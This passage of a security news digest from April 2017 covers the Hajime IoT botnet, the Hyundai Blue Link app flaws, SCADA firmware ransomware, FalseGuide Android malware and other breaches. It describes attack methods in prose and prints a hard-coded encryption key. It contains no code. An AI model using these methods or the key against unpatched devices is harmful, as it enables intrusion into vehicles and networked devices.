One of the most interesting things about Hajime is the botnet also displays a cryptographically signed message every 10 minutes or so on infected device terminals, describing its creators as "just a white hat, securing some systems."
Unlike Mirai and other IoT botnets, Hajime lacks DDoS capabilities and other hacking skills except for the propagation code that lets one infected IoT device search for other vulnerable devices and infects them.
But What if…?
What's not known is: What the Hajime Botnet is for? or Who is behind it?
"The most intriguing thing about Hajime is its purpose," says Kaspersky security researchers. "While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity, adding that "its real purpose remains unknown."
Also, the researchers believe that this might not happen, because Hajime botnet takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult.
So far, the purpose behind building this botnet is not entirely clear, but all signs yet point to a possible white-hat hacker, who is on his/her mission to secure open and vulnerable systems over the Internet.
However, the most concerning issue of all — Is there any guarantee that the Hajime author will not add attack capabilities to the worm to use the hijacked devices for malicious purposes?
Maybe today the Hajime author is in the mission to secure the world, but tomorrow, when he would realize he could make money online by renting his/her botnet to others, he could be another Adam Mudd.
Mudd, a 19-year-old teenager, has recently been sentenced to 2 years in prison for creating and running a DDoS-for-hire service called 'Titanium Stresser' that made more than 1.7 million victims of DDoS attacks since 2013.
Secondly, What if the well-intentioned botnet is hijacked by some malicious actor?
If this happens, the vigilant IoT botnet could be used for malicious purposes, such as conducting DDoS attacks against online sites and services, spreading malware, or instantly bricking the infected devices at one click.
Radware researchers also believe that the flexible and extensible nature of the Hajime botnet can be used for malicious purposes, like those mentioned above and conducting real-time mass surveillance from Internet-connected webcams, according to a new threat advisory published Wednesday by Radware.
Last but not the least: Do we seriously need some vigilante hackers to protect our devices and network?
This solution could be temporary, trust me. For example, the latest Hajime botnet is nothing but a band-aid.
Since Hajime has no persistence mechanism, as soon as the infected device is rebooted, it goes back to its previously unsecured state, with default passwords and the Telnet port open to the world.
How to Protect your IoT devices?
The only true solution is You — Instead of just sitting over there, doing nothing and waiting for some vigilante hackers to do miracles, you can protect your IoT devices in a way Hajime or any well-intentioned botnet can't do.
So go and update the firmware of your devices, change their default passwords, put them behind a firewall, and if any device is by default vulnerable and cannot be updated, throw it and buy a new one.
Just keep in mind: Once a single IoT of yours gets compromised, your whole network falls under risk of getting compromised and so all your devices which are connected to that network.
DoD Launches "Hack the Air Force" Bug Bounty Program
27.4.2017 securityweek BigBrothers
Following the success of the “Hack the Pentagon” and “Hack the Army” initiatives, the U.S. Department of Defense announced on Wednesday the launch of the “Hack the Air Force” bug bounty program.
“Hack the Air Force” will be the Pentagon’s largest bug bounty project as it’s open to experts not only from the United States, but also from Five Eyes countries, which includes the United Kingdom, Canada, Australia and New Zealand.
The program, run on the HackerOne platform, aims to help the Air Force strengthen its critical assets. White hat hackers who report vulnerabilities will be eligible for monetary rewards, but the exact amounts have not been specified.
Only vetted researchers can register; military members and government civilians can participate, but they will not earn any rewards.
“This is the first time the AF has opened up our networks to such a broad scrutiny,” said Air Force Chief Information Security Officer Peter Kim. “We have malicious hackers trying to get into our systems every day. It will be nice to have friendly hackers taking a shot and, most importantly, showing us how to improve our cybersecurity and defense posture. The additional participation from our partner nations greatly widens the variety of experience available to find additional unique vulnerabilities.”
Registration for “Hack the Air Force” opens on May 15. The event will take place between May 30 and June 23.
A total of 371 people registered for the previous Hack the Army program. They submitted 416 vulnerability reports, 118 of which were classified as unique and actionable. Participants were awarded roughly $100,000.
Hack the Pentagon received 138 valid submissions and it cost the U.S. government $150,000, half of which went to participants.
The Hajime Botnet continues to grow and implements a new attack technique
27.4.2017 securityaffairs BotNet
The mysterious Hajime Botnet continues to grow and reached 300,000 IoT Devices, the author also implemented a new attack method.
Recently experts from Symantec spotted a new IoT botnet dubbed Hajime that is spreading quickly in the last months, mostly in Brazil and Iran.
The Hajime malware was first spotted in October 2016, it implements the same mechanism used by the Mirai botnet to spread itself. The threat targets unsecured IoT devices with open Telnet ports and still used default passwords. Researchers discovered Hajime uses the same list of username and password combinations that Mirai, plus two more.
Unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.
“There isn’t a single C&C server address, instead the controller pushes command modules to the peer network and the message propagates to all the peers over time. This is typically considered a more robust design as it makes takedowns more difficult.” reads the analysis published by Symantec.
Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes. The threat has a modular structure allowing operators to add new capabilities on the fly.
The analysis of the Hajime reveals that it doesn’t implement denial of service (DDoS) capabilities or any other attacking code. Symantec researchers noticed that Hajime fetches a statement from its controller and displays it on the terminal every 10 minutes. The message is:
Just a white hat, securing some systems. Important messages will be signed like this!
Hajime Author.
Contact CLOSED
Stay sharp!
The message is digitally signed and the worm will only accept messages signed by a hardcoded key. Once infected a system, the worm blocks access to ports 23, 7547, 5555, and 5358, in order to prevent attacks from other IoT threats, including Mirai.
Experts believe Hajime could be the work of a cyber vigilante, in the past we have observed similar codes like the Linux.Wifatch discovered by Symantec in October 2015.
According to a research conducted by a new research conducted by Kaspersky Lab, the Hajime botnet continues to grow, it has already recruited up to 300,000 IoT devices.
The author of the Hajime is continuing to update the code, researchers at Kaspersky observed that he made recent changes in the attack module introducing the TR-069 exploitation. Currently, the bot implements three different attack methods: TR-069 exploitation, Telnet default password attack, and Arris cable modem password of the day attack.
“Technical Report 069 is a standard published by the Broadband Forum, which is an industry organization defining standards used to manage broadband networks. Many ISPs and device manufacturers are members of the Broadband Forum. TR-069 allows ISPs to manage modems remotely. TCP port 7547 has been assigned to this protocol, but some devices appear to use port 5555 instead.” reads the analysis published by Kaspersky.
“The TR-069 NewNTPServer feature can be used to execute arbitrary commands on vulnerable devices.”
The TR-069 attack was implemented last year when hackers compromised more than 900.000 routers of the from Deutsche Telekom.
Experts at Kaspersky discovered that the Hajime botnet targets any device on the Internet with the exception of specific networks and devices. The author of the threat recently improved the detection logic of the malicious code.
“Once the attack successfully passes the authentication stage, the first 52 bytes of the victim’s echo binary are read. The first 20 bytes, which is the ELF header, hold information about the architecture, operating system and other fields. The victim’s echo ELF header is then compared against a predefined array, containing the Hajime stub downloader binaries for different architectures.” states Kaspersky. “This way the correct Hajime-downloader binary that works on the victim’s machine, can be uploaded from the attacker (which is actually the infected device that started the attack).”
A honeypot set up by Kaspersky registered during a 24-hour period 2,593 successful telnet Hajime attacks. 2,540 of them originated from unique IP addresses, 949 of the hosts provided a payload, and 528 of them had an active web server running at port 80/tcp.
Most attacks were powered by compromised devices located in Vietnam (20.04%), Taiwan (12.87%) and Brazil (8.94%).
“The most intriguing thing about Hajime is its purpose. While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity. Nevertheless, we advise owners of IoT devices to change the password of their devices to one that’s difficult to brute force and to update the firmware if possible,” concluded Kaspersky.
New SCADA Flaws Allow Ransomware, Other Attacks
27.4.2017 securityaffairs ICS
Ransomware attack on SCADA
SINGAPORE — ICS CYBER SECURITY CONFERENCE — Mission-critical control systems that don’t pose an obvious risk can be hijacked and leveraged for attacks by profit-driven cybercriminals and other threat actors, researchers warned.
Cybercriminals have been increasingly relying on ransomware to make a profit by taking hostage personal and business files. Experts have also started issuing warnings regarding the possibility of ransomware attacks targeting industrial systems.
Proof-of-concept (PoC) ransomware designed to target industrial control systems (ICS) was described recently by security firm CRITIFENCE and researchers at the Georgia Institute of Technology.
These attacks focused on programmable logic controllers (PLCs), which are often critical for operations and can represent a tempting and easy target for malicious actors. However, Alexandru Ariciu. ICS security consultant at Applied Risk, disclosed another potential target on Thursday at SecurityWeek’s ICS Cyber Security Conference in Singapore.
Ariciu showed that ransomware attacks, which he has dubbed “Scythe,” can also target SCADA devices that are inconspicuous and which may be considered less risky.
Affected vendors have not been named, but the devices have been described by the expert as various types of I/O systems that stand between field devices and the OPC server (e.g. remote terminal units, or RTUs). The devices are powered by an embedded operating system and they run a web server.
Thousands of these systems are easily accessible from the Internet, allowing attackers to hijack them by replacing their firmware with a malicious version.
The attack scenario developed and demonstrated by Applied Risk starts with the attacker scanning the Web for potential targets. According to Ariciu, many devices can be identified using the Shodan search engine, but even more targets can be found via a simple Google search.
Ariciu has tested four devices from different vendors and discovered nearly 10,000 systems accessible directly from the Internet. The researcher said most of these systems lack any authentication mechanism, allowing easy access.
The expert believes an attacker could identify widely used devices and concentrate on targeting those. Once the target has been identified, the attacker first needs to acquire the device and conduct hardware debugging on it to determine how it works. The general attack process is the same for all devices, but the exploit needs to be customized for each specific product.
It took Applied Risk three months of analyzing ports, using various hardware hacking techniques, firmware dumping, and reverse engineering to determine how each device works and how it can be attacked.
Ariciu pointed out that the hands-on analysis is required to create the exploit, but once the exploit has been developed the attack can be launched remotely against devices accessible from the Internet.
The attack relies on a firmware validation bypass vulnerability that can be exploited to replace the legitimate firmware with a malicious one. In the ransomware scenario described by Applied Risk, the attacker connects to the targeted device’s interface, creates a backup for the configuration of the targeted device, and installs firmware that disrupts regular processes.
The victim sees that the compromised device has been disconnected and when they access it for analysis they are greeted with a ransomware message.
In order to prevent the victim from restoring the firmware, the attacker can “disable” the firmware and configuration update functionality. The “restore factory settings” feature does not mitigate the attack in most cases as the process does not restore the original firmware. Nevertheless, this feature can also be disabled by a hacker.
While the attack described by Ariciu prevents the victim from restoring the firmware, the attacker is still able to restore the device and its configuration if the victim pays the ransom. That is because the firmware update functionality is not actually disabled. The user needs to know the name of the firmware file in order to launch an update. If the attacker assigns a random file name of 32 characters or more, it will be impossible for the victim to determine it and conduct the firmware update.
The researcher has warned that once they determine how a specific device can be hacked, attackers may be able to launch mass attacks by leveraging the firewall update utilities provided by vendors.
Based on the number of vulnerable devices accessible from the Internet, Applied Risk believes attackers could make millions of dollars through such a campaign. According to the security firm, many organizations admitted that such an attack could cause serious disruptions — the devices are often part of mission-critical systems — which increases the chances of the ransom being paid.
Organizations alerted by the security firm indicated that they had never considered making configuration backups, especially since these devices are rarely reconfigured once they are deployed. However, losing the configuration could have serious consequences considering that a significant amount of time is spent configuring the devices.
While Applied Risk has developed a PoC demonstrating a ransomware attack that would likely be launched by profit-driven cybercriminals, Ariciu told SecurityWeek that other types of attacks are also possible. For instance, the vulnerability can be exploited by sophisticated threat actors to damage devices, either for sabotage or as a distraction while a different attack is being launched.
The four companies whose products are affected have been notified. The devices are available at prices ranging between €300 and €1,000.
Two of the vendors, including a major player, acknowledged the severity of the firewall validation bypass vulnerability. However, they indicated that fixing the security hole is not an easy task and they are still trying to identify the best approach for addressing the problem.
UK Government Complains After Twitter Cuts Data Access
27.4.2017 seciurityweek Social
The British government has complained to Twitter over a block on access to data from the social network, which it was reportedly using to track potential terror attacks, officials said Wednesday.
"The government has protested against this decision and is in ongoing discussions with Twitter to attempt to get access to this data," a Home Office spokesman said.
Prime Minister Theresa May's spokesman declined to specify exactly what the data was and why it was important, saying only that "we wish to have access to this information".
But he told reporters: "The fight against terrorism is not just one for the police and the security services. Social media and tech companies have a role to play."
The Daily Telegraph newspaper reported that the government had been tracking terms related to potential terror attacks via a third-party firm, but this had now been blocked.
In a blog posting in November, Twitter executive Chris Moody said the firm encouraged developers to create products that used real-time data from the social network "in the public interest", for example tracking emergencies and natural disasters.
"Recent reports about Twitter data being used for surveillance, however, have caused us great concern," he wrote.
He said that tracking or profiling protesters or activists was "absolutely unacceptable and prohibited", including via Twitter's application software programs.
"We prohibit developers using the Public APIs and Gnip data products from allowing law enforcement -- or any other entity -- to use Twitter data for surveillance purposes. Period," he said.
Security vulnerabilities in Hyundai Blue Link mobile app allowed hackers to steal vehicles
27.4.2017 seciurityaffairs Mobil
Security vulnerabilities in the Hyundai Blue Link mobile apps allowed hackers to steal vehicles, the car maker fixed them.
Security vulnerabilities in the Hyundai Blue Link mobile apps could be exploited by hackers to locate, unlock and start vehicles of the carmaker.
The Blue Link application is available for both iOS and Android mobile OSs, it was developed to allow car owners to remotely access and monitor their vehicle.
The app implements many features including remote engine start, cabin temperature control, stolen vehicle recovery, remote locking and unlocking, vehicle health reports, and automatic collision notifications.
Researchers at security firm Rapid7 discovered two potentially serious vulnerabilities affecting the log transmission feature added in December 2016.
According to the experts, the versions 3.9.4 and 3.9.5 of the Blue Link mobile apps upload an encrypted log file to a static IP address over HTTP on port 8080. The file contains several pieces of information, including login credentials, PIN, and historical GPS data. The name of the file includes the user’s email address.
The experts also discovered that log file is encrypted with the hard coded key “1986l12Ov09e” that cannot be changed.
A hacker can power a man-in-the-middle (MitM) attack to intercept the HTTP traffic associated with the Blue Link mobile application and access the log file.
“Affected versions of Hyundai Blue Link mobile application upload application logs to a static IP address over HTTP on port 8080. The log is encrypted using a symmetrical key, “1986l12Ov09e”, which is defined in the Blue Link application (specifically, C1951e.java), and cannot be modified by the user.” states the analysis published by Rapid7.
Clearly, the information contained in the log file can be used by the attacker to locate, unlock and start the targeted vehicle.
The ICS-CERT released a security advisory on the flaws affecting the Hyundai Blue Link mobile app. The two flaws reported in the advisory are the MitM vulnerability tracked as CVE-2017-6052 and rated as a medium severity issue and the hardcoded cryptographic key weakness tracked as CVE-2017-6054 and rated as high severity.
“Successful exploitation of these vulnerabilities may allow a remote attacker to gain access to insecurely transmitted sensitive information, which could allow the attacker to locate, unlock, and start a vehicle associated with the affected application.” states the advisory.
According to Hyundai, there was no evidence that the vulnerabilities had been exploited by threat actors in the wild.
“Rapid7 working with Hyundai Motor America reports that it would be difficult to impossible to conduct this attack at scale, since an attacker would typically need to first subvert physically local networks, or gain a privileged position on the network path from the app user to their service instance.”
Both issued were reported by Rapid7 in February, Hyundai patched them in March with the release of Blue Link mobile app version 3.9.6 for both iOS and Android.
The Blue Link mobile app version 3.9.6 version disabled the log transmission and the TCP service located at the IP address where the log files were sent.
The update of the app is mandatory for all users.
Mysterious Hajime Botnet Grows to 300,000 IoT Devices: Kaspersky
26.4.2017 securityweek BotNet
Hajime, a piece of Internet of Things (IoT) malware that emerged in October 2016, has already ensnared roughly 300,000 devices in a botnet, Kaspersky Lab researchers say.
The malware emerged around the same time the infamous Mirai botnet started making the rounds, and is targeting the same devices that this threat does, but without using them to launch distributed denial of service (DDoS) attacks. Instead, it simply closes some ports to keep the infected devices away from Mirai and similar threats.
Called Hajime to keep the naming scheme in line with Mirai (they mean “beginning” and “future” in Japanese, respectively), the worm managed to build a peer-to-peer (P2P) botnet, but researchers aren’t sure about its purpose right now. Symantec said recently that a white hat hacker could have created the malware, but suggested that the botnet could be easily repurposed for nefarious operations.
What’s certain, however, is that Hajime’s author continues to update the code, as recently made changes were seen in the attack module. At the moment, the worm supports three different attack methods: TR-069 exploitation, Telnet default password attack, and Arris cable modem password of the day attack. The TR-069 exploit was implemented only recently, Kaspersky reveals.
TR-069 (Technical Report 069), a standard published by the Broadband Forum, is used by ISPs to manage modems remotely via TCP port 7547 (some devices use port 5555). By abusing the TR-069 NewNTPServer feature, attackers can execute arbitrary commands on vulnerable devices. Late last year, the TR-069 attack was used to crash nearly 1 million modems from Deutsche Telekom.
According to Kaspersky, Hajime attacks any device on the Internet with the exception of several networks, and its author recently improved the architecture detection logic. Thus, after passing the authentication stage, the malware reads the first 52 bytes of the victim’s echo binary (information about architecture and operating system is in the first 20 bytes), and then compares the echo ELF header against a predefined array, so as to fetch the correct Hajime-downloader binary.
On the other hand, despite Hajime being able to attack any device, the authors focused on some specific brands/devices, as the worm uses only specific username-password combinations to brute-force its way into vulnerable devices. The threat uses one combination or the other based on words contained in the welcome message when opening a telnet session.
Instead of the telnet passwords, the malware uses a specially crafted password of the day when it encounters Arris cable modems. Although the ARRIS password of the day is a remote backdoor known since 2009, many ISPs don’t bother changing the default seed at all. After successfully compromising these devices, Hajime gains access to a remote shell and can execute commands.
During a 24-hour period, Kaspersky’s honeypot registered 2,593 successful telnet Hajime attacks. 2,540 came from unique IP addresses, 949 of the hosts provided a payload, and 528 of them had an active web server running at port 80/tcp. Most attacking devices (which were themselves victims to Hajime) were located in Vietnam (20.04%), Taiwan (12.87%) and Brazil (8.94%).
Looking at infected peers as DHT seeders, the researchers discovered 15,888 unique infected boxes, most located in Iran (14.38%), Vietnam (11.45%) and Brazil (6.94%). When looking at infected peers as DHT leechers, however, the researchers found 297,499 unique infected hosts, all of which were requesting Hajime config. Iran (19.65%), Brazil (8.80%), and Vietnam (7.87%) are affected the most.
“The most intriguing thing about Hajime is its purpose. While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity. Nevertheless, we advise owners of IoT devices to change the password of their devices to one that’s difficult to brute force and to update the firmware if possible,” Kaspersky notes.
Cybersecurity Executive Order Recommendation issued by ISC2
26.4.2017 securityaffairs Cyber
(ISC)² delivered recommendations to White House urging prioritization on development of workforce for the final version of the cybersecurity executive order
The nonprofit organization (ISC)² has issued a recommendation calling President Trump to develop workforce as a priority when he issued the final version of the cybersecurity executive order. The main goal is to tackle the lack of professionals and to address a variety of uncertainty across the industry.
Industry leaders and government agencies in a move aimed to counter the hiring freeze executive order that has limited the investments in cybersecurity developed the recommendations.
The lack of new cybersecurity professionals and talents across the industry is not compatible with senior professionals leaving the market for retirement.
The actual emerging threat landscape of new menaces and the progresses already done in the cyber security field were taken into account as well as the human resource personnel on incentivizing jobs acquisition, hiring, and retention.
Other recommendations include the development of communicator to translate technical risks to board members, retention of talents and a new approach based on NIST for compliance based on resilience.
executive order
The recommendation takes into account the recent data breaches and new threats as ransomware and IoT. It underlines that security does not reside in Compliance but in an in-depth defense and an understanding of the board members of the risks related to lack of personnel and understanding about new technologies.
The recommendations come in the period of President Trump first 100 days in office, in such way that the executive orders can address all the topics and furthermore prepare the nation for the future. The formation of a Cyber National Guard (ISC)² urged the White House to address to help scientific, technological, engineering and math graduates to reimburse student loans if they accept work for federal agencies.
Sources:
http://www.darkreading.com/operations/isc2-issues-white-house-cybersecurity-executive-order-recommendations/d/d-id/1328685?_mc=RSS_DR_EDT
http://blog.isc2.org/isc2_blog/2017/04/isc2-cybersecurity-workforce-recommendations.html
http://www.executivegov.com/2017/04/nonprofit-offers-white-house-recommendations-to-bolster-federal-cyber-workforce/
Beware! New Android Malware Infected 2 Million Google Play Store Users
26.4.2017 thehackernews Android
Initially thought to be 600,000 users, the number of Android users who have mistakenly downloaded and installed malware on their devices straight from Google Play Store has reached 2 Million.
Yes, about 2 Million Android users have fallen victim to malware hidden in over 40 fake companion guide apps for popular mobile games, such as Pokémon Go and FIFA Mobile, on the official Google Play Store, according to security researchers from Check Point.
Dubbed FalseGuide by the Check Point researchers, the malware creates a "silent botnet out of the infected devices" to deliver fraudulent mobile adware and generate ad revenue for cybercriminals.
Nearly 2 Million Android Users Infected!
While initially it was believed that the oldest instance of FalseGuide was uploaded to the Google Play in February and made its way onto over 600,000 devices within two months, further in-depth analysis by researchers revealed more infected apps which date back to November 2016.
"Since April 24, when the article below was first published, Check Point researchers learned that the FalseGuide attack is far more extensive than originally understood," Check Point researchers wrote in a blog post.
"The apps were uploaded to the app store [Google Play Store] as early as November 2016, meaning they hid successfully for five months, accumulating an astounding number of downloads."
Russian connection with FalseGuide
Check Point researchers discovered five additional apps containing the FalseGuide malware on Google Play Store, developed by "Anatoly Khmelenko" (translated from Russian Анатолий Хмеленко).
Also, the first batch of malicious apps was submitted under the Russian names of two fake developers, Sergei Vernik and Nikolai Zalupkin, which suggests the malware is of Russian origin.
FalseGuide attempts to turn infected devices into a botnet that could allow its operator to control the devices without the knowledge of the device owners.
Here's How FalseGuide Works:
While downloading to the victim's phone, FalseGuide requests administrative permissions to the device in an attempt to avoid being deleted by the user.
The malware then registers itself with Firebase Cloud Messaging – a cross-platform messaging service that allows app developers to send messages and notifications.
Once subscribed to this service, FalseGuide can allow the attackers to send messages containing links to additional malware and install them to the infected device, enabling attackers to display illegitimate pop-up ads out of context and generate revenue.
Depending on their objectives, the attackers could also inject highly malicious code into an infected device to root it, conduct a Distributed Denial of Service (DDoS) attack, or even penetrate private networks.
Google Removed the Malware hidden Apps, but are you Clean?
Check Point has provided a full list of malicious apps hiding FalseGuide, which posed as guides for FIFA Mobile, Criminal Case, Super Mario, Subway Surfers, Pokemon Go, Lego Nexo Knights, Lego City My City, Ninjago Tournament, Rolling Sky, Amaz3ing Spider-Man, Drift Zone 2, Dream League Soccer, and many more.
Check Point researchers notified Google about FalseGuide in February, after which the company silently removed the malware apps from the Play Store.
But despite being removed, the malicious apps are likely still active on a number of devices, leaving Android users open to cyber attacks.
"Mobile botnets are a growing trend since early last year, growing in both sophistication and reach," CheckPoint said. "This type of malware manages to infiltrate Google Play due to the non-malicious nature of the first component, which only downloads the actual harmful code."
How to Protect yourself against such Malware
There are standard protection measures you need to follow to remain unaffected:
Always download apps which are from trusted and verified developers and stick to trusted sources, like Google play Store and the Apple App Store.
Always verify app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.
Keep a good antivirus app on your device that can detect and block such malware before it can infect your device. Always keep the app up-to-date.
Do not download apps from third party source. Although in this case, the app is being distributed through the official Play Store, most often such malware are distributed via untrusted third-party app stores.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
Be careful which apps you give administrative rights to. Admin rights are powerful and can give an app full control of your device.
Never click on links in SMS or MMS sent to your mobile phone. Even if the email looks legit, go directly to the website of origin and verify any possible updates.
Four Essential Security & Privacy Extensions for Chrome
26.4.2017 securityaffairs Security
Here are the top four extensions for the Chrome browser to keep your online activity safe, secure and private.
The recent global wave of cybercrimes, particularly via exploiting loopholes in many leading browsers, has put internet privacy and online security directly in the line of fire. Internet users, in general, are worried about securing their data against the threats posed by hackers and the vulnerabilities in their favorite browsers.
Talking about browsers, Chrome is one of the most used browsers in the world. There are many extensions developed for the Chrome browser that provides an added layer of security and privacy. Following is our review of the essential extensions for Chrome that can protect your online privacy.
Privacy Chrome Extensions
PureVPN Chrome Extension
What sets PureVPN extension apart from all other privacy extensions is its completeness. While users need a different extension for each category of privacy they may be looking for, PureVPN is an all-in-one package. It blocks ads, provides malware protection, protection against hackers and viruses, and encrypts any data sent over the internet. Of course, it allows users to change their location as well, enabling them to access geo-restricted content too. This easy-to-use Chrome extension contains quick access features that make it one of the most trending extensions currently being used by thousands of users around the world.
HTTPS Everywhere
While this extension only provides partial security, it is a great tool for users who are looking for better and more secure ways of encrypting their communication. HTTPS Everywhere works with many popular websites, communication platforms, as well as social media platforms, making instant communications secure around the world. It has been developed as a joint venture between The Tor Project and the Electronic Frontier Foundation.
Disconnect Search
This free chrome extension has a specialized built-in feature that allows users to make private searches and browse anonymously on Chrome. The developers claim that they do not collect any private information, IP addresses or search logs, which makes it secure. Along with the free Chrome extension, the developers have also created it as a web service, which makes it simpler to use and configure according to users’ desired preferences.
Ghostery
This extension is known for its mysterious capabilities of revealing the “invisible” web. It can display a list of all trackers, web bugs, pixels on the page, and beacons. The invisible web is used by hundreds of websites to gather behavioral data of different users and then target them with related ads. Advanced options in the extension also allow users to specifically identify whether someone is tracking their browsing activities. Despite the detailed insight that this extension can provide, it doesn’t feature any tool to address the loopholes that compromise user data.
Atlassian HipChat group chat service hacked, change your password now!
26.4.2017 securityaffairs Hacking
Atlassian announced that unknown hackers broke into a cloud server of the company and accessed a huge amount of data of its group chat service HipChat.
On Monday, Atlassian reset user passwords for its group chat service HipChat after it notified its customers of a data breach. Unknown hackers broke into a cloud server of the company and stole a huge amount of data, including group chat logs.
According to Atlassian, attackers exploited a vulnerability in a “popular third-party” software library used by its HipChat.com service, the company did not reveal the name of the library.
“This weekend our Security Intelligence Team detected a security incident affecting a server in the HipChat Cloud web tier. The incident involved a vulnerability in a popular third-party library used by HipChat.com. We have found no evidence of other Atlassian systems or products being affected.” reads the security notice published by Atlassian.
“As a precaution, we have invalidated passwords on all HipChat-connected user accounts and sent those users instructions on how to reset their password.”
Hackers accessed user account data, including names, hashed passwords, and email addresses, according to the company, no financial data has been exposed.
According to the company, hackers may have stolen metadata from HipChat “rooms” or groups, this information could be used to extract information that’s not intended to be public.
Attackers may also have stolen messages and content in chat rooms for about 0.05 percent of the instances.
“For the vast majority of instances (more than 99.95%), we have found no evidence that messages or content in rooms have been accessed.” continues the data breach notification.
The company excluded that other systems of products (i.e. Jira, Confluence, or Trello) have been affected.
The good news for the users is that hacked service uses the bcrypt cryptographic algorithm for password hashing, and this system is hard to crack.
The company is already working to fix the security vulnerability in the third-party library exploited by hackers, it is preparing an update for HipChat Server that will be shared with customers directly through the standard update channel.
Atlassian has also isolated the affected systems while actively working with law enforcement on the investigation of this hack.
If you are a HipChat user, change your password and be vigilant of Phishing messages.
Kritická chyba umožňuje přístup k systému skrz ovládací aplikace monitorů
26.4.2017 Živě.cz Zranitelnosti
Bezpečnostní experti společnosti SEC Consult informovali o kritické zranitelnosti aplikace, kterou vyvíjí Portrait Displays a využívá ji mnoho výrobců monitorů – Sony, HP, Acer, Fujitsu, Philips, Dell, Benq, Lenovo, Sharp či Toshiba. V případě zneužití je možné v systému vytvářet nové uživatele, měnit jejich oprávnění či měnit uživatelské skupiny.
Antivirová společnost omylem označila jako malware systémové soubory. Zákazníkům se zhroutily Windows
Podle SEC Consult se chyba týká primárně aplikací DisplayView od Fujitsu a Display Assistant, která je určena pro monitory HP. Není však vyloučeno ani postižení dalších aplikací výše zmíněných výrobců. Vývojáři z Portrait Displays urychleně vydali opravný patch, nyní jej však v rámci aktualizací musí implementovat jednotliví výrobci, kteří platformu pro svůj software využívají.
K uživatelům by se měla oprava dostat v rámci automatických aktualizací, které umožňuje například Fujitsu. V opačném případě ale mohou být uživatelé ohroženi – jen málokdo bude ručně aktualizovat ovládací software k monitoru.
Pokud vám tedy na stole stojí monitor Fujitsu či HP a zároveň máte nainstalovanou ovládací aplikaci, rozhodně se porozhlédněte po bezpečnostních updatech.
Podvodníci to zkouší na internetu s loterií. Po útoku chtějí výkupné
26.4.2017 Novinky/Bezpečnost Podvod
Nový trik zkouší na internetu počítačoví piráti. Prostřednictvím nevyžádaných e-mailů lákají na nejrůznější loterie. Upozornil na to český Národní bezpečnostní tým CSIRT.CZ, který dostal avízo od slovinských kolegů. Podobné útoky totiž byly zaznamenány především v zahraničí.
„Slovinský SI-CERT zveřejnil zprávu o nové vlně infikovaných souborů zasílaných prostřednictvím e-mailových zpráv. Ty jsou odesílány pod záminkou nabídek loterií maloobchodních řetězců, žádostí o zastoupení v advokátních kancelářích,“ varoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.
Podle něj vedle loterie zkouší podvodníci napálit důvěřivce i pomocí dalších témat, která mohou být na první pohled zajímavá. Například informují o změnách v letových řádech nebo o ustanoveních přednášených na univerzitách
Lidé přitom kyberzločince v tomto případě nemohou identifikovat podle toho, odkud je e-mail odesílán. „„Zdrojů, odkud jsou tyto zprávy zasílány, je totiž více. Ale spojuje je jedna věc, většinou obsahují jednu přílohu dokument_1.zip. Ta pak může mít v sobě i více dokumentů, mezi kterými je i jeden dokument_1.js, který se snaží infikovat počítač,“ doplnil Bašta.
Ukryté vyděračské viry
Mezi dokumenty se zpravidla ukrývá nějaký vyděračský virus. Tyto škodlivé kódy, které jsou označovány souhrnným názvem ransomware, dokážou v počítači nadělat velkou neplechu. Nejprve zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.
Zaplatit zpravidla chtějí v bitcoinech, protože pohyby této virtuální měny se prakticky nedají vystopovat. A tím logicky ani nelegální aktivita počítačových pirátů.
Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné.
Podobné útoky prostřednictvím nevyžádaných e-mailů se prozatím objevily v zahraničí, především ve Slovinsku. Je nicméně pravděpodobné, že se stejným způsobem budou snažit kyberzločinci v dohledné době napálit také české uživatele.
Antivirová společnost omylem označila jako malware systémové soubory. Zákazníkům se zhroutily Windows
26.4.2017 Živě.cz Zranitelnosti
Antivirový výrobce Webroot v těchto dnech řeší nepříjemnou kauzu, které jistě ve skrytu duše děsí úplně všichni z oboru. Bezpečnostní program totiž před několika hodinami chybně označil zcela korektní soubory jako malware a zablokoval je. Jedná se tedy o klasický případ false-positive.
Kdyby se jednalo o pár osobních souborů z uživatelské složky, asi by o nic nešlo a uživatel by soubory prostě odstranil z trezoru, v tomto případě však Webroot zablokoval třeba systémové soubory vývojové verze Windows z programu Insider Preview. To v praxi vedlo k tomu, že systém havaroval a přirozeně odmítal nastartovat.
Sledovat
Neil Jackson @Jaxxnet
Webroot seem to have angered a lot of their customers.... the system is in utter meltdown after borking legit system and app files. Ooops.
00:56, 25. Apr. 2017
3 3 retweety 1 1 lajk
Některým dalším zákazníkům pak podle Ars Techniky program podobným způsobem zablokoval některé podnikové aplikace. Webroot nyní musí ožehavou kauzu urychleně vyřešit, jeho marketingové oddělení ale bude průšvih řešit asi ještě docela dlouho.
Sledovat
iSupportU @isupportu
@Webroot everything is breaking, money is flying out the window... where are you? I have been on hold 20+min
01:20, 25. Apr. 2017
retweetů lajků
Sledovat
Pat Moore @DueMarauder
@Webroot What's the scoop on this false positive issue that has crippled a quarter of my customers?
00:30, 25. Apr. 2017
retweetů lajků
Microsoft vydal opravný balík pro Creators Update. Řeší i potíže s režimem Connected Standby
26.4.2017 Cnews.cz Zranitelnosti
Záplatovací úterý ještě není, nová hlavní verze Windows 10 ale potřebuje opravit.
Kdo už přešel na Windows 10 Creators Update, mohla se mu už včera večer nebo dnes ráno zobrazit výzva k restartování zařízení. Microsoft totiž uvolnil balík oprav a pokračuje v nastolené tradici, kdy čerstvé vydání Windows 10 nezískává aktualizace jen jednou do měsíce, ale častěji. Včerejší aktualizace nese označení KB4016240 a číslo sestavení zdvihá na 15063.250.
Neobsahuje nové záplaty, jen ladí nahlášené chyby:
